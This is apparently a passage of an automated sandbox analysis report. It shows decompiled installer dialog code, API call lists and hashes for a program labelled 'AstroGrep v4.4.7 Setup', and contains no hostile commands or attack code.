				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42dbd0 = GetDlgItem(_a4, 0x403);
				 *0x42dbc8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42dbe4 = _t128;
				_v8 = _t128;
				E00403F49( *0x42dbd0);
				 *0x42dbd4 = E004047E6(4);
				 *0x42dbec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F14(_a4);
				if(( *0x42e418 & 0x00000003) != 0) {
					ShowWindow( *0x42dbd0, _t150);
					if(( *0x42e418 & 0x00000002) != 0) {
						 *0x42dbd0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F49( *0x42dbc8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42e418 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}





































                                                                                                            0x0040508c
                                                                                                            0x00405094
                                                                                                            0x00405097
                                                                                                            0x0040509f
                                                                                                            0x004050a2
                                                                                                            0x00405231
                                                                                                            0x00405237
                                                                                                            0x00405254
                                                                                                            0x0040525b
                                                                                                            0x0040525b
                                                                                                            0x00405267
                                                                                                            0x0040526d
                                                                                                            0x0040528f
                                                                                                            0x0040528f
                                                                                                            0x00405295
                                                                                                            0x004052ea
                                                                                                            0x004052ea
                                                                                                            0x004052ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004052ef
                                                                                                            0x004052f2
                                                                                                            0x004052f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004052ff
                                                                                                            0x00405305
                                                                                                            0x00405307
                                                                                                            0x0040530a
                                                                                                            0x00405407
                                                                                                            0x00000000
                                                                                                            0x00405407
                                                                                                            0x00405319
                                                                                                            0x00405325
                                                                                                            0x0040532e
                                                                                                            0x00405335
                                                                                                            0x00405339
                                                                                                            0x0040533c
                                                                                                            0x00405345
                                                                                                            0x0040534b
                                                                                                            0x0040534e
                                                                                                            0x0040534e
                                                                                                            0x0040535e
                                                                                                            0x00405364
                                                                                                            0x00405367
                                                                                                            0x00405372
                                                                                                            0x00405372
                                                                                                            0x00405373
                                                                                                            0x00405376
                                                                                                            0x0040537d
                                                                                                            0x00405384
                                                                                                            0x0040538c
                                                                                                            0x0040538c
                                                                                                            0x0040539a
                                                                                                            0x004053a0
                                                                                                            0x004053a3
                                                                                                            0x004053a3
                                                                                                            0x004053aa
                                                                                                            0x004053b0
                                                                                                            0x004053b9
                                                                                                            0x004053c0
                                                                                                            0x004053c9
                                                                                                            0x004053cb
                                                                                                            0x004053ce
                                                                                                            0x004053dd
                                                                                                            0x004053df
                                                                                                            0x004053e2
                                                                                                            0x004053e3
                                                                                                            0x004053e6
                                                                                                            0x004053e7
                                                                                                            0x004053e8
                                                                                                            0x004053e8
                                                                                                            0x004053f0
                                                                                                            0x004053fb
                                                                                                            0x00405401
                                                                                                            0x00405401
                                                                                                            0x00000000
                                                                                                            0x00405367
                                                                                                            0x00405297
                                                                                                            0x0040529d
                                                                                                            0x004052cb
                                                                                                            0x004052cd
                                                                                                            0x004052d3
                                                                                                            0x004052d5
                                                                                                            0x004052de
                                                                                                            0x004052de
                                                                                                            0x004052e5
                                                                                                            0x00000000
                                                                                                            0x004052e5
                                                                                                            0x004052a1
                                                                                                            0x004052ab
                                                                                                            0x00000000
                                                                                                            0x0040526f
                                                                                                            0x0040526f
                                                                                                            0x00405275
                                                                                                            0x004052b0
                                                                                                            0x00000000
                                                                                                            0x004052b7
                                                                                                            0x0040527e
                                                                                                            0x00405285
                                                                                                            0x0040528a
                                                                                                            0x00000000
                                                                                                            0x0040528a
                                                                                                            0x0040526d
                                                                                                            0x004050a8
                                                                                                            0x004050ac
                                                                                                            0x004050b4
                                                                                                            0x004050b8
                                                                                                            0x004050bb
                                                                                                            0x004050be
                                                                                                            0x004050c1
                                                                                                            0x004050c4
                                                                                                            0x004050c5
                                                                                                            0x004050c6
                                                                                                            0x004050df
                                                                                                            0x004050e2
                                                                                                            0x004050ec
                                                                                                            0x004050fb
                                                                                                            0x00405103
                                                                                                            0x0040510b
                                                                                                            0x00405110
                                                                                                            0x00405113
                                                                                                            0x0040511f
                                                                                                            0x00405128
                                                                                                            0x00405131
                                                                                                            0x00405153
                                                                                                            0x00405159
                                                                                                            0x0040516a
                                                                                                            0x0040516f
                                                                                                            0x0040517d
                                                                                                            0x0040518b
                                                                                                            0x0040518b
                                                                                                            0x00405190
                                                                                                            0x0040519e
                                                                                                            0x0040519e
                                                                                                            0x004051a3
                                                                                                            0x004051a6
                                                                                                            0x004051ab
                                                                                                            0x004051b7
                                                                                                            0x004051c0
                                                                                                            0x004051cd
                                                                                                            0x004051dc
                                                                                                            0x004051cf
                                                                                                            0x004051d4
                                                                                                            0x004051d4
                                                                                                            0x004051e8
                                                                                                            0x004051e8
                                                                                                            0x004051fc
                                                                                                            0x00405205
                                                                                                            0x0040520e
                                                                                                            0x0040521e
                                                                                                            0x0040522a
                                                                                                            0x0040522a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004050E5
                                                                                                            • GetDlgItem.USER32 ref: 004050F4
                                                                                                            • GetClientRect.USER32 ref: 00405131
                                                                                                            • GetSystemMetrics.USER32 ref: 00405138
                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                            • GetDlgItem.USER32 ref: 004051F5
                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                            • GetDlgItem.USER32 ref: 00405103
                                                                                                              • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                            • GetDlgItem.USER32 ref: 00405246
                                                                                                            • CreateThread.KERNELBASE ref: 00405254
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040525B
                                                                                                            • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                            • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                            • CreatePopupMenu.USER32 ref: 00405310
                                                                                                            • AppendMenuA.USER32 ref: 00405325
                                                                                                            • GetWindowRect.USER32 ref: 00405345
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                            • EmptyClipboard.USER32 ref: 004053B0
                                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                            • GlobalLock.KERNEL32 ref: 004053C3
                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                            • SetClipboardData.USER32 ref: 004053FB
                                                                                                            • CloseClipboard.USER32 ref: 00405401
                                                                                                            Strings
                                                                                                            • AstroGrep v4.4.7 Setup , xrefs: 00405376
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                            • String ID: AstroGrep v4.4.7 Setup
                                                                                                            • API String ID: 4154960007-2178112666
                                                                                                            • Opcode ID: b94e12a8617ae1be9cc25c09676e899251da99f6313db78d6ff988929f539234
                                                                                                            • Instruction ID: b5f1ce2ce4d05df4ba5ebffd303825d409c0ca4f752acec20acacd4dcda6ac6e
                                                                                                            • Opcode Fuzzy Hash: b94e12a8617ae1be9cc25c09676e899251da99f6313db78d6ff988929f539234
                                                                                                            • Instruction Fuzzy Hash: C9A14871900208BFEB119FA0DD89AAE7F79FB08354F10407AFA01BA1A0C7755E51DF69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004048C5, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E004048C5(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				int _t194;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t277;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				int _t295;
				int _t296;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x42e428;
				_t282 = 0;
				_v24 =  *0x42e410 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42e419 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404813(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42e418) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42984c; // 0x0
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x429860; // 0x0
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42984c = _t282;
								 *0x429860 = _t282;
								 *0x42e460 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42e419 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404893();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_t194 =  *0x429860; // 0x0
									_v32 = _t194;
									_t195 =  *0x42e428;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42e42c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x42dbdc; // 0x6fdecd
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E004047CE(0x3ff, 0xfffffffb, E004047E6(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72); // executed
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42e42c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x429860);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42e460 = _t306;
					 *0x429860 = GlobalAlloc(0x40,  *0x42e42c << 2);
					_t252 = LoadBitmapA( *0x42e400, 0x6e);
					 *0x429854 =  *0x429854 | 0xffffffff;
					_t313 = _t252;
					 *0x42985c = SetWindowLongA(_v8, 0xfffffffc, E00404EBC); // executed
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0); // executed
					 *0x42984c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42984c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageA(_v12, 0x143, _t282, E00405D51(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageA(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403F14(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403F14(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42e42c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
										_t295 =  *0x429860; // 0x0
										 *(_t295 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_t296 =  *0x429860; // 0x0
									_v32 = 1;
									 *(_t296 + _t316 * 4) = _t276;
									_t277 =  *0x429860; // 0x0
									_t284 =  *(_t277 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42e42c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F49(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F49(_v12);
								L91:
								return E00403F7B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



































































                                                                                                            0x004048d4
                                                                                                            0x004048e5
                                                                                                            0x004048ea
                                                                                                            0x004048f2
                                                                                                            0x004048f8
                                                                                                            0x00404900
                                                                                                            0x0040490e
                                                                                                            0x00404911
                                                                                                            0x00404b31
                                                                                                            0x00404b38
                                                                                                            0x00404b4c
                                                                                                            0x00404b3a
                                                                                                            0x00404b3c
                                                                                                            0x00404b3f
                                                                                                            0x00404b40
                                                                                                            0x00404b47
                                                                                                            0x00404b47
                                                                                                            0x00404b58
                                                                                                            0x00404b66
                                                                                                            0x00404b69
                                                                                                            0x00404b7f
                                                                                                            0x00404bf4
                                                                                                            0x00404bf7
                                                                                                            0x00404bf9
                                                                                                            0x00404c03
                                                                                                            0x00404c11
                                                                                                            0x00404c11
                                                                                                            0x00404c13
                                                                                                            0x00404c1d
                                                                                                            0x00404c23
                                                                                                            0x00404c26
                                                                                                            0x00404c29
                                                                                                            0x00404c44
                                                                                                            0x00404c2b
                                                                                                            0x00404c35
                                                                                                            0x00404c35
                                                                                                            0x00404c29
                                                                                                            0x00404c1d
                                                                                                            0x00000000
                                                                                                            0x00404bf7
                                                                                                            0x00404b84
                                                                                                            0x00404b8f
                                                                                                            0x00404b94
                                                                                                            0x00404b9b
                                                                                                            0x00404ba0
                                                                                                            0x00404ba4
                                                                                                            0x00404baf
                                                                                                            0x00404baf
                                                                                                            0x00404bb3
                                                                                                            0x00404bb7
                                                                                                            0x00404bbb
                                                                                                            0x00404bce
                                                                                                            0x00404bbd
                                                                                                            0x00404bbd
                                                                                                            0x00404bc4
                                                                                                            0x00404bca
                                                                                                            0x00404bc6
                                                                                                            0x00404bc6
                                                                                                            0x00404bc6
                                                                                                            0x00404bc4
                                                                                                            0x00404bd2
                                                                                                            0x00404bd4
                                                                                                            0x00404be7
                                                                                                            0x00404bea
                                                                                                            0x00404bed
                                                                                                            0x00404bed
                                                                                                            0x00404bb7
                                                                                                            0x00000000
                                                                                                            0x00404ba4
                                                                                                            0x00404b86
                                                                                                            0x00404b8d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404c47
                                                                                                            0x00404c47
                                                                                                            0x00404c4e
                                                                                                            0x00404cbf
                                                                                                            0x00404cc7
                                                                                                            0x00404ccf
                                                                                                            0x00404ccf
                                                                                                            0x00404cd8
                                                                                                            0x00404cda
                                                                                                            0x00404ce1
                                                                                                            0x00404ce4
                                                                                                            0x00404ce4
                                                                                                            0x00404cea
                                                                                                            0x00404cf1
                                                                                                            0x00404cf4
                                                                                                            0x00404cf4
                                                                                                            0x00404cfa
                                                                                                            0x00404d00
                                                                                                            0x00404d06
                                                                                                            0x00404d06
                                                                                                            0x00404d13
                                                                                                            0x00404e69
                                                                                                            0x00404e70
                                                                                                            0x00404e8d
                                                                                                            0x00404e93
                                                                                                            0x00404ea5
                                                                                                            0x00404ea5
                                                                                                            0x00000000
                                                                                                            0x00404d19
                                                                                                            0x00404d1b
                                                                                                            0x00404d20
                                                                                                            0x00404d25
                                                                                                            0x00404d2a
                                                                                                            0x00404d2c
                                                                                                            0x00404d2c
                                                                                                            0x00404d2d
                                                                                                            0x00404d2e
                                                                                                            0x00404d30
                                                                                                            0x00404d30
                                                                                                            0x00404d38
                                                                                                            0x00404d79
                                                                                                            0x00404d7b
                                                                                                            0x00404d80
                                                                                                            0x00404d8b
                                                                                                            0x00404d8e
                                                                                                            0x00404d93
                                                                                                            0x00404d9a
                                                                                                            0x00404d9d
                                                                                                            0x00404e3f
                                                                                                            0x00404e45
                                                                                                            0x00404e4b
                                                                                                            0x00404e53
                                                                                                            0x00404e64
                                                                                                            0x00404e64
                                                                                                            0x00000000
                                                                                                            0x00404e53
                                                                                                            0x00404da3
                                                                                                            0x00404da6
                                                                                                            0x00404dac
                                                                                                            0x00404db1
                                                                                                            0x00404db3
                                                                                                            0x00404db5
                                                                                                            0x00404dbb
                                                                                                            0x00404dc2
                                                                                                            0x00404dc7
                                                                                                            0x00404dce
                                                                                                            0x00404dd1
                                                                                                            0x00404dd1
                                                                                                            0x00404dd8
                                                                                                            0x00404de4
                                                                                                            0x00404de8
                                                                                                            0x00404dea
                                                                                                            0x00404dea
                                                                                                            0x00404dda
                                                                                                            0x00404ddc
                                                                                                            0x00404ddc
                                                                                                            0x00404e0a
                                                                                                            0x00404e16
                                                                                                            0x00404e25
                                                                                                            0x00404e25
                                                                                                            0x00404e27
                                                                                                            0x00404e2a
                                                                                                            0x00404e33
                                                                                                            0x00000000
                                                                                                            0x00404d3a
                                                                                                            0x00404d45
                                                                                                            0x00404d48
                                                                                                            0x00404d4d
                                                                                                            0x00404d4f
                                                                                                            0x00404d53
                                                                                                            0x00404d63
                                                                                                            0x00404d6d
                                                                                                            0x00404d6f
                                                                                                            0x00404d72
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404d55
                                                                                                            0x00404d55
                                                                                                            0x00404d5b
                                                                                                            0x00404d5d
                                                                                                            0x00404d5d
                                                                                                            0x00404d5e
                                                                                                            0x00404d5f
                                                                                                            0x00000000
                                                                                                            0x00404d55
                                                                                                            0x00404d38
                                                                                                            0x00404d13
                                                                                                            0x00404c56
                                                                                                            0x00000000
                                                                                                            0x00404c6c
                                                                                                            0x00404c76
                                                                                                            0x00404c7b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404c8d
                                                                                                            0x00404c92
                                                                                                            0x00404c9e
                                                                                                            0x00404c9e
                                                                                                            0x00404ca0
                                                                                                            0x00404caf
                                                                                                            0x00404cb1
                                                                                                            0x00404cb5
                                                                                                            0x00404cb8
                                                                                                            0x00000000
                                                                                                            0x00404cb8
                                                                                                            0x00404c56
                                                                                                            0x00404917
                                                                                                            0x0040491c
                                                                                                            0x00404925
                                                                                                            0x0040492c
                                                                                                            0x0040493a
                                                                                                            0x00404945
                                                                                                            0x0040494b
                                                                                                            0x00404959
                                                                                                            0x0040496d
                                                                                                            0x00404972
                                                                                                            0x0040497f
                                                                                                            0x00404984
                                                                                                            0x0040499a
                                                                                                            0x004049ab
                                                                                                            0x004049b8
                                                                                                            0x004049b8
                                                                                                            0x004049bb
                                                                                                            0x004049c1
                                                                                                            0x004049c3
                                                                                                            0x004049c6
                                                                                                            0x004049cb
                                                                                                            0x004049d0
                                                                                                            0x004049d2
                                                                                                            0x004049d2
                                                                                                            0x004049e6
                                                                                                            0x004049f2
                                                                                                            0x004049f2
                                                                                                            0x004049f4
                                                                                                            0x004049f5
                                                                                                            0x004049fa
                                                                                                            0x004049fd
                                                                                                            0x00404a00
                                                                                                            0x00404a04
                                                                                                            0x00404a09
                                                                                                            0x00404a0e
                                                                                                            0x00404a12
                                                                                                            0x00404a17
                                                                                                            0x00404a1c
                                                                                                            0x00404a1e
                                                                                                            0x00404a26
                                                                                                            0x00404af0
                                                                                                            0x00404b03
                                                                                                            0x00000000
                                                                                                            0x00404a2c
                                                                                                            0x00404a2f
                                                                                                            0x00404a32
                                                                                                            0x00404a35
                                                                                                            0x00404a35
                                                                                                            0x00404a3b
                                                                                                            0x00404a41
                                                                                                            0x00404a44
                                                                                                            0x00404a4a
                                                                                                            0x00404a4b
                                                                                                            0x00404a50
                                                                                                            0x00404a59
                                                                                                            0x00404a60
                                                                                                            0x00404a63
                                                                                                            0x00404a66
                                                                                                            0x00404a69
                                                                                                            0x00404aa5
                                                                                                            0x00404ac6
                                                                                                            0x00404ac8
                                                                                                            0x00404ace
                                                                                                            0x00404aa7
                                                                                                            0x00404ab4
                                                                                                            0x00404ab4
                                                                                                            0x00404a6b
                                                                                                            0x00404a6e
                                                                                                            0x00404a7d
                                                                                                            0x00404a87
                                                                                                            0x00404a89
                                                                                                            0x00404a8f
                                                                                                            0x00404a96
                                                                                                            0x00404a99
                                                                                                            0x00404a9e
                                                                                                            0x00404a9e
                                                                                                            0x00404a69
                                                                                                            0x00404ad4
                                                                                                            0x00404ad5
                                                                                                            0x00404ae1
                                                                                                            0x00404ae1
                                                                                                            0x00404aee
                                                                                                            0x00404b09
                                                                                                            0x00404b0d
                                                                                                            0x00404b2a
                                                                                                            0x00404b2f
                                                                                                            0x00000000
                                                                                                            0x00404b0f
                                                                                                            0x00404b14
                                                                                                            0x00404b1d
                                                                                                            0x00404ea7
                                                                                                            0x00404eb9
                                                                                                            0x00404eb9
                                                                                                            0x00404b0d
                                                                                                            0x00000000
                                                                                                            0x00404aee
                                                                                                            0x00404a26

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004048DD
                                                                                                            • GetDlgItem.USER32 ref: 004048E8
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                            • LoadBitmapA.USER32 ref: 00404945
                                                                                                            • SetWindowLongA.USER32 ref: 0040495E
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                            • DeleteObject.GDI32(00000000), ref: 004049BB
